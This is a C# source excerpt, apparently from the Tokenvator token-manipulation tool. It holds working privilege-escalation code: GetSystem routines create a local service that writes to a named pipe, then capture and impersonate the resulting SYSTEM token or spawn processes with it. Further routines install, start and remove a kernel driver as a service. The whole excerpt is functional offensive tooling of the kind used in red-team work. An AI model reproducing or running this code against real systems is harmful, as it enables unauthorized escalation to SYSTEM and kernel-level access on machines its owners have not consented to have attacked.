////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
internal static void GetSystem(String command, String arguments)
{
Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator"));
using (PSExec psExec = new PSExec("Tokenvator"))
{
psExec.Connect(".");
psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator");
psExec.Open();
thread.Start();
waitHandle.WaitOne();
psExec.Start();
psExec.Stop();
}
thread.Join();
Create createProcess;
if (0 == System.Diagnostics.Process.GetCurrentProcess().SessionId)
{
createProcess = CreateProcess.CreateProcessWithLogonW;
}
else
{
createProcess = CreateProcess.CreateProcessWithTokenW;
}
createProcess(hToken, command, arguments);
}
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
internal static void GetSystem()
{
Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator"));
using (PSExec psExec = new PSExec("Tokenvator"))
{
psExec.Connect(".");
psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator");
psExec.Open();
thread.Start();
waitHandle.WaitOne();
psExec.Start();
psExec.Stop();
}
thread.Join();
if (IntPtr.Zero != hToken)
{
advapi32.ImpersonateLoggedOnUser(hToken);
kernel32.CloseHandle(hToken);
Console.WriteLine("[+] Operating as {0}", System.Security.Principal.WindowsIdentity.GetCurrent().Name);
hToken = IntPtr.Zero;
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private static void _UnInstallDriver(CommandLineParsing cLP)
{
string service;
if (cLP.GetData("servicename", out service))
{
using (PSExec p = new PSExec(service))
{
if (!p.Connect("."))
{
return;
}
if (!p.Open())
{
return;
}
if (!p.Stop())
{
return;
}
if (!p.Delete())
{
return;
}
}
}
else
{
Console.WriteLine("[-] Unable to identify /Service");
}
}
////////////////////////////////////////////////////////////////////////////////
// Starts the KernelTokens Driver
////////////////////////////////////////////////////////////////////////////////
private static void _StartDriver(CommandLineParsing cLP)
{
string sn;
if (!cLP.GetData("ServiceName", out sn))
{
Console.WriteLine("[-] ServiceName not set");
return;
}
PSExec p = new PSExec(sn);
if (!p.Connect("."))
{
Console.WriteLine("[-] Unable to connect to service controller");
return;
}
if (!p.Start())
{
return;
}
}
////////////////////////////////////////////////////////////////////////////////
// sc create TokenDriver binPath="C:\Windows\System32\kerneltokens.sys" type=kernel
////////////////////////////////////////////////////////////////////////////////
private static void _InstallDriver(CommandLineParsing cLP)
{
//string servicename = Misc.NextItem(ref command);
//string path = Misc.NextItem(ref command);
//string force = Misc.NextItem(ref command);
string serviceName = "TokenDriver";
string sn;
if (cLP.GetData("ServiceName", out sn))
{
serviceName = sn;
}
string path = string.Empty;
string p;
if (cLP.GetData("Path", out p))
{
path = (string)p;
}
bool overwrite = false;
object f;
if (cLP.GetData("Force", out f))
{
overwrite = true;
}
Console.WriteLine("[*] Service Name: " + serviceName);
Console.WriteLine("[*] Service Path: " + path);
PSExec psexec = new PSExec(serviceName);
if (!psexec.Connect("."))
{
Console.WriteLine("[-] Unable to connect to service controller");
return;
}
string filename;
try
{
filename = Path.GetFullPath(path);
}
catch (Exception ex)
{
if (ex is ArgumentException)
{
filename = CreateProcess.FindFilePath(path);
if (string.IsNullOrEmpty(filename))
{
Console.WriteLine("[-] Unable to locate service binary");
return;
}
}
else
{
return;
}
}
Console.WriteLine("[*] Full Path: " + filename);
if (!File.Exists(filename))
{
Console.WriteLine("[-] Unable to find service binary: {0}");
return;
}
if (!psexec.Open())
{
if (!psexec.CreateDriver(filename, overwrite))
{
return;
}
if (!psexec.Open())
{
return;
}
}
if (!psexec.Start())
{
return;
}
}